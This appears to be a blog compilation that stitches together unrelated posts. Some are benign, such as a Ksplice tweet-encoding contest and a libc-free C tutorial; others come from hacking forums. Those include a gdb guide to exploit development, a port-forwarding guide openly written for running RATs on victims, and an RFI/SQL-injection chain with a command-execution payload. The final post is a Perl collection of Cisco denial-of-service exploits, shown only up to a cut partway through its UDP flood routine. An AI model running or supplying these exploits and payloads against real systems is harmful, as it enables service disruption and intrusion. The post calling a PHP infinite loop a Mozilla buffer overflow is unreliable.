0000000 375 277 277 277 277 273

Ben: Hey, that kind of worked! When we fetch it back using Twitter’s JSON API, we get this JSON fragment:

“text”:”\\375\\277\\277\\277\\277\\273″

Alyssa: It’s the same thing we sent! The character (really an unassigned code position) is represented in UTF-8, in octal with backslashes in ASCII. That means Twitter “characters” are actually 31 bits, not 20.1 bits. The capacity of a tweet is actually a lot bigger than the 2.8 kilobits we calculated earlier.
Ben: Should we worry that the text only shows up in the JSON API, not XML or HTML, and these high characters only last a few days on Twitter’s site before vanishing?
Alyssa: Nope. As long as we had this exchange in our conversation, people on the Internet won’t complain about those issues.
Using Alyssa’s insight that Twitter actually supports 31-bit UCS characters (not just Unicode), we can come up with a simple program to send 4.2-kilobit tweets using only code positions that aren’t in Unicode. That way there’s no ambiguity between these crazy code positions, which Twitter represents as backslashed octal, and legitimate Unicode, which Twitter sends literally. These tweets have a text field that’s a whopping 3,360 bytes long — but in ASCII octal UTF-8, so they only represent 525 bytes of information in the end.
The sender program reads the first 525 bytes of standard input or a file, slices it into 30-bit chunks, and sends it to Twitter using 31-bit UCS code positions. The high bit of each character is set to 1 to avoid ever sending a valid Unicode UTF-8 string, which Twitter might treat ambiguously. It outputs the ID of the tweet it posted. You’ll have to fill in your own username and password to test it.
The receiver program does the opposite — give it an ID on the command line, and it will retrieve and decode a “megatwit” encoded by the sender.
Here’s an example of how to use the programs and verify that they can encode at least one arbitrary 4,200-bit message:

$ dd if=/dev/urandom of=random.bits bs=525 count=1
1+0 records in
1+0 records out
525 bytes (525 B) copied, 0.0161392 s, 32.5 kB/s
$ md5sum random.bits
a7da09e59d1b6807e78aac7004e6ba41 random.bits
$ ./megatwit-send < random.bits
11037181699
$ ./megatwit-get 11037181699 | md5sum
a7da09e59d1b6807e78aac7004e6ba41 -

But this is just the start -- we're not the only ones interested in really long tweets. (Structures, strictures...) Others have found an apparent loophole in how Twitter handles some URLs, allowing them to send tweets with a text field up to 532 bytes long (how much information can be coded this way isn't clear). Maxitweet has come up with a clever way to milk the most out of 140 Unicode characters without requiring a decoder program, at least at its lower compression levels. There are definitely even better ways to cram as many bits as possible into a tweet.
So here is the challenge for the 1st International Longest Tweet Contest:
Come up with a strategy for encoding arbitrary binary data into a single tweet, along the lines of the sample programs described here.
Implement a sender and receiver for the strategy in a computer programming language of your choice. We recommend you choose a language likely to be runnable by a wide variety of readers. At your option, you may provide a Web site or other public implementation for others to test your coding scheme with arbitrary binary input.
Write a description, in English, for how your coding scheme works. Explain how many bits per tweet it achieves, and justify your calculation. The explanation must be convincing because it is intractable to prove conclusively that a certain capacity is achievable, even if a program successfully sends and receives many test cases.
Send your entry, consisting of #2 and #3, to megatwit@ksplice.com before Sunday, April 11, 2010, 23h59 UTC.
Based on the English explanations of the coding schemes (#3), we'll select finalists from among the entrants. In mid-April, we'll post the finalists' submissions on the blog. In the spirit of Twitter, we'll let the community assess, criticize, test, and pick apart the finalists' entries.
Based on the community's feedback, we'll choose at least one winner. This will generally be the person whose scheme for achieving the highest information encoded per tweet is judged most convincing.
The winner will receive notoriety and fame on this blog, and a smart-looking Ksplice T-shirt in the size of your choice. You will be known the world over as the Reigning Champion of the International Longest Tweet Contest until there is another contest. Legally we can't promise this, but there's a chance Stephen Colbert will have you on as a result of winning this prestigious contest.
By entering the contest, you are giving Ksplice permission to post your entry if you are selected as a finalist. The contest is void where prohibited. The rules are subject to change at our discretion. Employees of Ksplice aren't eligible because they already have T-shirts. Judging will be done by Ksplice in its sole discretion.
That's it. Happy tweeting!
Hello from a libc-free world! (Part 1)
Posted in computer architecture on March 16th, 2010 by Jessica McKellar – 104 Comments
As an exercise, I want to write a Hello World program in C simple enough that I can disassemble it and be able to explain all of the assembly to myself.
This should be easy, right?
This adventure assumes compilation and execution on a Linux machine. Some familiarity with reading assembly is helpful.
Here’s our basic Hello World program:

jesstess@kid-charlemagne:~/c$ cat hello.c
#include

int main()
{
printf("Hello World\n");
return 0;
}

Let’s compile it and get a bytecount:

jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10931 hello

Yikes! Where are 11 Kilobytes worth of executable coming from? objdump -t hello gives us 79 symbol-table entries, most of which we can blame on our using the standard library.
So let’s stop using it. We won’t use printf so we can get rid of our include file:

jesstess@kid-charlemagne:~/c$ cat hello.c
int main()
{
char *str = "Hello World";
return 0;
}
Recompiling and checking the bytecount:
jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10892 hello

What? That barely changed anything!
The problem is that gcc is still using standard library startup files when linking. Want proof? We’ll compile with -nostdlib, which according to the gcc man page won’t “use the standard system libraries and startup files when linking. Only the files you specify will be passed to the linker”.

jesstess@kid-charlemagne:~/c$ gcc -nostdlib -o hello hello.c
/usr/bin/ld: warning: cannot find entry symbol _start; defaulting to 00000000004000e8

Well, it’s just a warning; let’s check it anyway:

jesstess@kid-charlemagne:~/c$ wc -c hello
1329 hello

That looks pretty good! We got our bytecount down to a much more reasonable size (an order of magnitude smaller!)…

jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

…at the expense of segfaulting when it runs. Hrmph.
For fun, let’s get our program to be actually runnable before digging into the assembly.
So what is this _start entry symbol that appears to be required for our program to run? Where is it usually defined if you’re using libc?
From the perspective of the linker, by default _start is the actual entry point to your program, not main. It is normally defined in the crt1.o ELF relocatable. We can verify this by linking against crt1.o and noting that _start is now found (although we develop other problems by not having defined other necessary libc startup symbols):

# Compile the source files but don't link
jesstess@kid-charlemagne:~/c$ gcc -Os -c hello.c
# Now try to link
jesstess@kid-charlemagne:~/c$ ld /usr/lib/crt1.o -o hello hello.o
/usr/lib/crt1.o: In function `_start':
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:106: undefined reference to `__libc_csu_fini'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:107: undefined reference to `__libc_csu_init'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:113: undefined reference to `__libc_start_main'
This check conveniently also tells us where _start lives in the libc source: sysdeps/x86_64/elf/start.S for this particular machine. This delightfully well-commented file exports the _start symbol, sets up the stack and some registers, and calls __libc_start_main. If we look at the very bottom of csu/libc-start.c we see the call to our program’s main:
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
and down the rabbit hole we go.
So that’s what _start is all about. Conveniently, we can summarize what happens between _start and the call to main as “set up a bunch of stuff for libc and then call main”, and since we don’t care about libc, let’s just export our own _start symbol that just calls main and link against that:
jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
call main
Compiling and running with our stub _start assembly file:
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

Hurrah, our compilation problems go away! However, we still segfault. Why? Let’s compile with debugging information and take a look in gdb. We’ll set a breakpoint at main and step through until the segfault:

jesstess@kid-charlemagne:~/c$ gcc -g -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ gdb hello
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x4000f4: file hello.c, line 3.
(gdb) run
Starting program: /home/jesstess/c/hello

Breakpoint 1, main () at hello.c:5
5 char *str = "Hello World";
(gdb) step
6 return 0;
(gdb) step
7 }
(gdb) step
0x00000000004000ed in _start ()
(gdb) step
Single stepping until exit from function _start,
which has no line number information.
main () at helloint.c:4
4 {
(gdb) step

Breakpoint 1, main () at helloint.c:5
5 char *str = "Hello World";
(gdb) step
6 return 0;
(gdb) step
7 }
(gdb) step

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000001 in ?? ()
(gdb)
Wait, what? Why are we running through main twice? …It’s time to look at the assembly:
jesstess@kid-charlemagne:~/c$ objdump -d hello

hello: file format elf64-x86-64

Disassembly of section .text:

00000000004000e8 <_start>:
4000e8: e8 03 00 00 00 callq 4000f0
4000ed: 90 nop
4000ee: 90 nop
4000ef: 90 nop

00000000004000f0 :
4000f0: 55 push %rbp
4000f1: 48 89 e5 mov %rsp,%rbp
4000f4: 48 c7 45 f8 03 01 40 movq $0x400103,-0x8(%rbp)
4000fb: 00
4000fc: b8 00 00 00 00 mov $0x0,%eax
400101: c9 leaveq
400102: c3 retq

D’oh! Let’s save a detailed examination of the assembly for later, but in brief: when we return from the callq to main we hit some nops and run right back into main. Since we re-entered main without putting a return instruction pointer on the stack as part of the standard prologue for calling a function, the second call to retq tries to pop a bogus return instruction pointer off the stack and jump to it and we bomb out. We need an exit strategy.
Literally. After the return from callq, push 1, the syscall number for SYS_exit, into %eax, and because we want to say that we’re exiting cleanly, put a status of 0, SYS_exit’s only argument, into %ebx. Then make the interrupt to drop into the kernel with int $0x80.

jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
call main
movl $1, %eax
xorl %ebx, %ebx
int $0x80
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
jesstess@kid-charlemagne:~/c$

Success! It compiles, it runs, and if we step through this new version under gdb it even exits normally.
Hello from a libc-free world!
Stay tuned for Part 2, where we’ll walk through the parts of the executable in earnest and watch what happens to it as we add complexity, in the process understanding more about x86 linking and calling conventions and the structure of an ELF binary.
reference: http://blog.ksplice.com/2010

How to use gdb for vuln developement

2010-05-19T21:06:00.000-07:00

* Start gdb:

[code]gdb 'executable-file'
gdb ./vuln // example

gdb `executable-file` `core-file`
gdb ./vuln core // example
[/code]

If program segfaults and no core image generated do something like:
hack@exploit:~ > ulimit -c 9999

* Attach running process:

[code]// launch gdb
hack@exploit:~ > gdb
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux".
(gdb) attach 'pid'
(gdb) attach 1127 // example
[/code]

* Search anything in memory
[code]
(gdb) x/d or x 'address' show dezimal
(gdb) x/100s 'address' show next 100 dezimals
(gdb) x 0x0804846c show dezimal at 0x0804846c
(gdb) x/s 'address' show strings at address
(gdb) x/105 0x0804846c show 105 strings at 0x0804846c
(gdb) x/x 'address' show hexadezimal address
(gdb) x/10x 0x0804846c show 10 addresses at 0x0804846c
(gdb) x/b 0x0804846c show byte at 0x0804846c
(gdb) x/10b 0x0804846c-10 show byte at 0x0804846c-10
(gdb) x/10b 0x0804846c+20 show byte at 0x0804846c+20
(gdb) x/20i 0x0804846c show 20 assembler instructions at address
[/code]

* Search shellcode or return address or anything else on stack:
[code]
(gdb) break 'your function name or address'
(gdb) break main // example
Breakpoint 1 at 0x8048409
(gdb) run
Starting program: /home/hack/homepage/challenge/buf/basic

Breakpoint 1, 0x8048409 in main ()
(gdb) x/1000s 'address' // Print 1000 strings at address
(gdb) p $esp // Show esp register
$2 = (void *) 0xbffff454
(gdb) x/1000s $esp // Search 1000 strings at $esp address.
(gdb) x/1000s $esp-1000 // Search 1000 strings at $esp register
// - 1000.
(gdb) x/1000s 0xbffff4b4 // Search 1000 strings at 0xbffff4b4
[/code]

* Listen all sections of executable file:
[code]
(gdb) maintenance info sections // or
(gdb) mai i s

Exec file:
`/home/hack/homepage/challenge/buf/basic', file type elf32-i386.
0x080480f4->0x08048107 at 0x000000f4: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS
0x08048108->0x08048128 at 0x00000108: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
0x08048128->0x08048158 at 0x00000128: .hash ALLOC LOAD READONLY DATA HAS_CONTENTS
0x08048158->0x080481c8 at 0x00000158: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
0x080481c8->0x08048242 at 0x000001c8: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS
0x08048242->0x08048250 at 0x00000242: .gnu.version ALLOC LOAD READONLY DATA
HAS_CONTENTS

...

[/code]
* Break at address
[code]
(gdb) disassemble main
Dump of assembler code for function main:
0x8048400

: push %ebp
0x8048401 : mov %esp,%ebp
0x8048403 : sub $0x408,%esp
0x8048409 : add $0xfffffff8,%esp
0x804840c : mov 0xc(%ebp),%eax
0x804840f : add $0x4,%eax
0x8048412 : mov (%eax),%edx
0x8048414 : push %edx
0x8048415 : lea 0xfffffc00(%ebp),%eax
...

(gdb) break *0x8048414 // example
Breakpoint 1 at 0x8048414
(gdb) break main // example
Breakpoint 2 at 0x8048409
(gdb)

[/code]
* Delete breakpoints
[code]
(gdb) delete breakpoints // or
(gdb) d b
Delete all breakpoints? (y or n) y
(gdb)
[/code]

* Search anything in heap, bss, got, ...:
[code]
(gdb) maintanance info sections

0x08049570->0x08049588 at 0x00000570: .bss ALLOC
0x00000000->0x00000654 at 0x00000570: .stab READONLY HAS_CONTENTS
0x00000000->0x00001318 at 0x00000bc4: .stabstr READONLY HAS_CONTENTS
0x00000000->0x000000e4 at 0x00001edc: .comment READONLY HAS_CONTENTS
0x08049588->0x08049600 at 0x00001fc0: .note READONLY HAS_CONTENTS

(gdb) x/1000s 0x08049600 // print strings heap
(gdb) x/1000s 0x08049570 // print strings bss section
...

[/code]
* show registers (Very useful for stack exploits)
[code]
(gdb) break main
Breakpoint 7 at 0x8048409
(gdb) r

Starting program: /home/hack/homepage/challenge/buf/basic

Breakpoint 7, 0x8048409 in main ()
(gdb) info registers
eax 0x1 1
ecx 0x8048298 134513304
edx 0x8048400 134513664
ebx 0x400f6618 1074751000
esp 0xbffff4b4 0xbffff4b4
ebp 0xbffff8bc 0xbffff8bc
esi 0x4000aa20 1073785376
edi 0xbffff924 -1073743580
eip 0x8048409 0x8048409
eflags 0x286 646
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb)

[/code]
* Get dynamic function pointer (Useful for return into libc exploits)
[code]
(gdb) break main
Breakpoint 1 at 0x8048409
(gdb) r
Starting program: /home/hack/homepage/challenge/buf/./basic

Breakpoint 1, 0x8048409 in main ()
(gdb) p system
$1 = {} 0x40052460

(gdb) p strcpy
$5 = {char *(char *, char *)} 0x4006e880

[/code]
* Backtrace the stack
[code]
(gdb) backtrace
(gdb) bt

#0 0x8048476 in main ()
#1 0x40031a5e in __libc_start_main () at ../sysdeps/generic/libc-start.c:93
[/code]
*****************************************************************************

This is the end of the paper. Have questions ? Mail me:
I can't write english very good. Sorry for my english. My URL is www.priestmaster.org.

Port Forwarding - The Complete Guide

2010-05-02T06:16:00.000-07:00

The Following Tutorial Includes:
Part 1: Gathering Information
Part 2: Port Forwarding
Part 3: Useful Alternatives
Part 4: Port Testing

Before we begin please regard the following:

What is Port Forwarding?
There are a couple of concepts you need to know before you can understand port forwarding. I'm going to make a couple broad statements that are almost always true. For simplicity lets assume they are true for now.

1.) Every device on the internet has at least one ip address. The IP address is a number that is used to identify a device. For more information on ip addresses refer to our What is an IP Address page.

2.) Every IP address is divided up into many ports. When one computer sends data to another computer, it sends it from a port on an ip address to a port on an ip address. For more information on ports refer to our What is a Port page.

3.) A port can only be used by one program at a time.
(PortForward)

How can we use Port forwarding?
Port forwarding can be used for many purposes. Such as gaming applications. However, we are going to use it for other programs. Port forwarding is essential for RAT's, so naturally it is a key for this for of black hatting. Without succesfully port forwarding you cannot run a rat. No matter which rat it is.

Part One: Gathering Information

What is My Router?
Knowing what router you are using is very important. For each router has a different format for it's setting's page. You will need to know your model number and the company that makes the router.

Example:

Linksys WRT54G3G
Linksys = The company

Linksys WRT54G3G
WRT54G3G = Model Number

What Port Do I Want to Forward?
Knowing which port is also important. Because, some ports are already in use, or are blocked on most computer's, including your victims. Such as port 80 and 25. Furthermore, without knowing which port to forward you cannot enter i into your RAT when you build a server.

What RAT am I Using?
You must know which RAT you are using so you know what port is best to use. This is not as important for portforwarding. But there is no point to port forward if you don't have a RAT.

Do I Have a Static Ip?
It is possible to port forward with a dynamic ip adress, but you would need to port forward every time you turn on your computer. A static ip address, however, will not change every time you restart your computer. To set up a Static Ip please referr to this guide.

Part Two: Port Forwarding

Step 1. Go into your command prompt via start menu/run/cmd.

Step 2. Type in: ip config
Rows of text will appear looking something like this:

Look for the Ip Address labeled "Default Gateway."

Step 3. Open up your web browser, and type in your "Default Gateway"
Address where you usually enter websites.

Step 4. A Pop up will show up asking for a username and password.
The Default Login Information is this:
Username: admin
Password: admin
If this does not work you will need to find out what was set.

Step 5. Log on and a new page with your Router settings should show up
It is different for each kind of router, but usually there is a tab
called either Applications & Gaming or Port Forwarding.

Step 6. Click on the tab, Applications & Gaming or Port Forwarding.

Step 7. It will ask you for this:
Application: (Just put the name of your RAT, doesnt matter)
Start Port: (The Port you wish to forward)
End Port: (The same Port you used for the the Start Port)
Protocol: (Both)
Ip Address: (Your default gateway + 00 if applicable)
Example: 127.168.1.100 not 127.168.1.1

Step 8. Check: Enable or something similar to that and click Save
Settings.

There You Go you have now succesfully Port Forwarded!

Part Three: Useful Alternatives

Method 1:
If you still cant portforward please visit this site for even more support right here. Otherwise, congratulations!

Method 2:
You can use Simple Port Forwarding Program by PCWinTech to easily port forward as well.

Download it here

We will be using the Port Forwarding Feature of this program:

Step 1. When you first open up the program two windows will
open up. Click on the option boxed in red below:

Step 2. Then another window will show up. Click Add Custom.

Step 3. The new window will show a few blank fields. Fill in what
you need:

Step 4. Click Add.

There you go you have succesfully port forwarded using a program!

Part Four: Port Testing

Method 1

Go to: CanYouSeeMe?
Type in the port you forwarded and click check.
It will tell you if you have port forwarded correctly.

Note: It will only say it worked if no program is already using that port.

Method 2

Download Port Checker from Portforward.com here
Type in your port and let it check it for you. You will also need to make sure no other program is using it at the moment.

refrence: hackforums

OllyDbg "Load DLL" TUT

2010-03-29T19:14:00.000-07:00

OllyDbg 1.10 can debug standalone DLLs. Windows is unable to launch DLL directly, so OllyDbg uses small executable named loaddll.exe. This program is kept as a packed resource. If file you are trying to open is a dynamic link library, OllyDbg automatically extracts loaddll.exe and starts it, passing library name as a parameter.
With the help of loaddll, you can call functions exported by debugged library. I will explain this feature on the example of Windows' API functions MessageBox and wsprintf that reside in USER32.DLL.

Example 1: MessageBox
1. Load DLL in the same way as ordinary .exe file. OllyDbg issues a warning:

Request to load DLL

Of course, we answer with "Yes". OllyDbg starts loaddll, loads library and pauses on a breakpoint that immediately preceeds the main window loop. This address is labelled as Firstbp. Then OllyDbg analyses DLL and displays its code. Note that Windows automatically execute DLL startup code when DLL is loaded into memory.

2. From the main menu, select "Debug|Call DLL export". The appearing dialog is non-modal, so you still have full access to all OllyDbg features. You can browse code and data, set breakpoints, modify memory and so on.

3. Select the function you want to call. We will begin with MessageBox. Note that this name is generic, in reality there are ASCII version MessageBoxA and UNICODE version MessageBoxW. Let's try with the second one. As we select it, rectangle to the right says: Number of arguments: 4. Analyzer determined that function ends with RET 10 and correctly recognized number of parameters. RET nnn is typical for functions that use PASCAL calling convention (parameters are passed on the stack, first parameter is pushed last, function removes parameters after call). Most Windows' API functions are PASCAL-style.

4. Set number of stack arguments. In our case this is not necessary, because OllyDbg already knows number of arguments in call to MessageBoxW. But, of course, you can override this decision anytime by clicking on the corresponding checkbox to the left.

5. Fill list of arguments. This dialog supports up to 10 stack parameters. Parameter is any valid expression that doesn't use registers. If operand points to memory, Dump window to the right from the argument displays contents of this memory. Loaddll.exe reserves 10 memory buffers, 1 K each, labelled as Arg1 .. Arg10, that you can freely use for any purpose. Additionally, dialog supports two pseudovariables: handle of parent window created by loaddll.exe and handle of loaddll's instance . For your convenience, when you use Call export for the first time, OllyDbg adds them to history lists.
MessageBoxW expects 4 parameters:

* handle of owner window. Here, we simply select ;
* address of UNICODE text in message box. Select Arg2 and press Enter. Dump displays contents of memory buffer in hexadecimal format. This buffer is initially filled with zeros. Right click on the Dump and choose "Text|UNICODE (32 chars)" presentation. Select first character and press Ctrl+E (or, alternatively, choose "Binary|Edit" from menu). In the appearing window, type "Text in box" or any other text to display;
* address of UNICODE title of message box. Select Arg3 and write "Box title" in UNICODE format to pointed memory;
* style of message box as a combination of MB_xxx constants. OllyDbg knows them, type here MB_OK|MB_ICONEXCLAMATION.

6. Set register arguments. Register arguments are seldom in exported functions. Nevertheless, OllyDbg support register arguments, too.

7. Select options. Hide on call means that dialog box should disappear from the screen when function executes. This option is useful when execution takes significant time, or if you set breakpoints. You can also close dialog manually. When called function finishes execution, OllyDbg will automatically reopen Call export. Pause after call means that debugged application will be paused after execution.
If everything is done correctly, dialog will look similar to this picture:

Before call

8. Call function by pressing Call.OllyDbg automatically backups all Dumps, verifies and calculates parameters and registers, removes dialog from the screen and then calls MessageBoxW. As expected, message box appears on the screen:

Message box

Bingo! Press OK. MessageBoxW returns and Call export reports success. Note that on return EAX contains 1. This is the numerical value of constant IDOK ("OK pressed"). This was simple, wasn't it?

Example 2: wsprintf
1. Select the function. I hope, Call export is still open? Like MessageBox, wsprintf also has two forms: ASCII wsprintfA and UNICODE wsprintfW. We will play with its ASCII form. As wsprintf accepts variable number of arguments, it uses C calling convention. Main difference from PASCAL is that it is the responsibility of calling code to clean stack from parameters after call. C functions end with RET and Analyzer is unable to determine number of arguments.

2. Set number of stack arguments. wsprintfA has variable number of arguments; how many - depends on format string. Let's try the following call:
wsprintf(Arg1,"arg3=%i, arg4=%08X",100,0x12345678);
As you see, we have 4 arguments, so click on checkbox "4".

3. Fill list of arguments.

* First argument is a buffer. Choose and change dump format to ASCII (32 chars);
* Second argument is format string. Choose and change dump to ASCII (32 chars). Select first character, press Ctrl+E (binary edit) and type format string in ASCII field;
* Third argument is a decimal constant 100. By default, OllyDbg assumes hexadecimal format. Decimal point at the end of the constant forces decimal;
* Fourth argument is a hexadecimal constant, just type it as is. OllyDbg accepts any form: 0x12345678, 12345678h or simply 12345678;

4. Call function. If everything is done correctly, you'll get the following result:

Result of call to wsprintfA

Highlighted characters in dump of Arg1 are those modified by call. In register EAX, wsprintf returns number of characters in output string: 0x17 (decimal 23.).

Details and sources
loaddll.exe is a compact Win32 application written in Assembler. Have a look at its source code here. Execution begins at START. loaddll gets command line, skips name of executable (must be taken into double quotes!), extracts path to DLL and passes it to LoadLibrary. On error, it places pointer to error message on fixed location and exits with code 0x1001. On success, it creates simple main window and pauses on Firstbp. This breakpoint is set by OllyDbg on startup.
All communication with OllyDbg is done through the 128-byte link area. This area must begin at address 0x420020 immediately after keyphrase. First several words contain addresses in loaddll.exe used by OllyDbg to set breakpoints and parameters, followed by address of function to call, contents of registers, number of arguments and arguments itself. Number of arguments is limited to 10. If argument is a pointer to memory, you can use 10 data buffers, 1 Kbyte each, named as Arg1, Arg2, ..., Arg10. These and some other names are exported and thus known to OllyDbg.
When loaddll passes main windows loop (WINLOOP), it constantly checks whether address of exported function in PROCADR is not 0. If this is the case, loaddll saves contents of ESP and EBP and pushes 16 zeros into stack. This is necessary to avoid crash if user specifies invalid number of arguments. Then it pushes arguments and sets registers. At address Prepatch there are 16 NOPs that you can use for small patches. If you need more space, you can jump to Patcharea 2 Kbytes long. Note that OllyDbg doesn't extract loaddll.exe from resources if file with this name already exists.
At CallDLL export is called. This command is followed by another 16 NOPs. Then routine saves modified registers and offset of ESP after call. If you supply invalid number of arguments to PASCAL-style function, OllyDbg will be able to report this error to you. Finally, loaddll restores ESP and EBP, zeroes PROCADR and breaks at INT3 at address Finished. When this point is reached, OllyDbg knows that execution is finished.
Treat LOADDLL.ASM as a freeware. I will not protest if you use this program as whole or in parts (without copyright) in your own programs. But do not dare to use the Green Bug (LOADDLL.RC) in projects not related to OllyDbg! That's all for now, enjoy!

thanks for TheOrb666

reference:hackforums.net

buffer overflow in mozilla 3.5.8

2010-02-22T06:44:00.001-08:00

first im just try to studied my friends about php, n suddenly my program make a browser hang or not responding...n i think this buffer overflow on mozilla 3.5.8

now, i will give a little script

################
# DEVILZC0DE #
################

#author : kiddies A.K.A peneter
#email : crasher_1412@yahoo.com
#thanks :mywisdom,gunslinger_,flyff666,petimati,whitehat,weinkaru,and all
#thank : my girl(vhee was beside me, if im so confuse)

save this, run it in your localhost:

$buffer=1;

while ($buffer > 0) {
echo $buffer;
}
?>

RFI over SQL Injection/Cross-Site Scripting

2010-01-31T22:29:00.000-08:00

An amusing attack was demonstrated in the course of the last penetration testing. It is a good example of practical application of Cross-Site Scripting. We had the following situation:

- User segment with an attacker (me) operating from it;
- Technological network with strictly restricted outgoing traffic;
- A web application in the technological network that is vulnerable to Remote File Including (RFI);
- A web application in the technological network that is vulnerable to SQL Injection.

SQL Injection per se didn’t allow us to exploit any useful threats and develop the attack (here it is, the dreadful effect of privilege minimization!). We also could not use the RFI vulnerability, because the traffic outgoing from the technological segment to the user segment and to the external environment was strictly restricted. For the purpose of exploitation of the RFI vulnerability, a chain like the following one was implemented:

http:///?param=http:///?param=1+union+select+''&cmd=passthru('ls');

That is, each of these tree vulnerabilities taken separately was useless. Only when they were combined for the common good purpose, they allowed us to exploit an information security threat, which was execution of arbitrary commands on the server :)

All in all, there is nothing supernatural here, but I found this attack to be rather amusing...

reference:http://ptresearch.blogspot.com/2010/01/rfi-over-sql-injectioncross-site.html

ciscodosexploits.pl

2010-01-28T18:38:00.000-08:00

#!/usr/bin/perl -w

#############################
#Cisco Router DOS collection#
# Devilzc0de Framework v.01 #
#############################

#thanks:mywisdom,gunslinger,flyff666,petimati n you!!
#programmer : kiddies A.K.A peneter
#Email : crasher_1412@yahoo.com or peneter@yahoo.com
#community thanks : Devilzc0de,jasakom,whitecyber,antijasakom and all i ve joined

use Socket;
use IO::Socket;

$host = "";
$pilih = "";
$host = @ARGV[ 0 ];
$pilih = @ARGV[ 1 ];

if ($host eq "") {
usage();
}
if ($pilih eq "") {
usage();
}
if ($pilih eq "1") {
cisco1();
}
elsif ($pilih eq "2") {
cisco2();
}
elsif ($pilih eq "3") {
cisco3();
}
elsif ($pilih eq "4") {
cisco4();
}
elsif ($pilih eq "5") {
cisco5();
}
elsif ($pilih eq "6") {
cisco6();
}
elsif ($pilih eq "7") {
cisco7();
}
elsif ($pilih eq "8") {
cisco8();
}
elsif ($pilih eq "9") {
cisco9();
} else {
printf "\ninvalid number....\n\n";
exit(1);
}

sub usage
{
print "\n Cisco Dos Exploits \n";
print "\n Devilzc0de Framework Dos v.0.1\n";
print "\nProgrammer :: kiddies A.K.A peneter\n";
printf"\n";
printf "\nUsage :: Cisco.pl \n";
printf "\nExploits Module :\n";
printf "[1] - Cisco IOS Router Denial of Service Vulnerability\n";
printf "[2] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
printf "[3] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
printf "[4] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
printf "[5] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
printf "[6] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
printf "[7] - Cisco IOS HTTP Denial of Service Vulnerability\n";
exit(1);
}
sub cisco1 # Cisco IOS Router Denial of Service Vulnerability
{
my $serv = $host;

my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...\n\n"};
$sockd->autoflush(1);
print $sockd "GET /\%\% HTTP/1.0\n\n";
-close $sockd;
print "Packet sent ...\n";
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
close($sockd2);
exit(1);
}
sub cisco2 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
my $serv = $host;
my $port = 22;
my $vuln = "a%a%a%a%a%a%a%";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No ssh server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
close($sockd);
exit(1);
}

sub cisco3 # Cisco 675 Web Administration Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET ? HTTP/1.0\n\n";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
close($sockd);
exit(1);
}
sub cisco4 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET /error?/ HTTP/1.0\n\n";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
while (<$sockd>){print}
close($sockd);
exit(1);
}

sub cisco5 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
my $ip = $host;
my $port = "514";
my $ports = "";
my $size = "";
my $i = "";
my $string = "%%%%%XX%%%%%";

print "Input packets size : ";
$size = ;
chomp($size);

socket(SS, PF_INET, SOCK_DGRAM, 17);
my $iaddr = inet_aton("$ip");

for ($i=0; $i<10000; $i++)
{ send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

printf "\nPackets sent ...\n";
sleep(2);
